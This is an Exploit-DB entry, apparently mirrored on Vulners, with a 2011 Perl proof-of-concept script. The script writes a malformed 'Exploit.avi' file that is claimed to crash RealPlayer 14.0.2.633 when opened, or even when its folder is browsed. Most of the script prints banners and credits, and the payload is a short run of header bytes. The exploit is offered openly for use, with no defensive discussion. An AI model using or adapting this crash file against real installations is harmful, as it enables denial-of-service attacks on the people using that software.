Lucene search
K

Real player 14.0.2.633 - Buffer Overflow (Denial of Service) (PoC)

🗓️ 01 Apr 2011 00:00:00Reported by ^Xecuti0N3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

Real player 14.0.2.633 Buffer Overflow/DOS Exploit. Exploit file generated for Real Player 14.0.2.633. Open Exploit.avi in Real Player for potential crash

Code
#!/usr/bin/perl
#(+)Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit
#(+)Software Link: www.soft32.com/download_122615.html
#(+)Software:  Real player
#(+)Version:   14.0.2.633
#(+)Tested On: WIN-XP SP3
#(+) Date    : 31.03.2011
#(+) Hour    : 13:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
system("color 6");
system("title Real player 14.0.2.633 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
																	
(+)Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit  
 
(+) Software Link: www.soft32.com/download_122615.html					
(+) Software:  Real player												
(+) Version:   14.0.2.633												
(+) Tested On: WIN-XP SP3												
(+) Date    : 31.03.2011												
(+) Hour    : 13:37 PM													
____________________________________________________________________\n";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> Exploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open Explot.avi with Real Player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the Exploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r \n
(+)^Xecuti0N3r: E-mail \n
(+)d3M0l!tioN3r: E-mail \n
(+)Special Thanks to: MaxCaps, aNnIh!LatioN3r & d3M0l!tioN3r \n
########################################################################\n\n";
system("pause");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation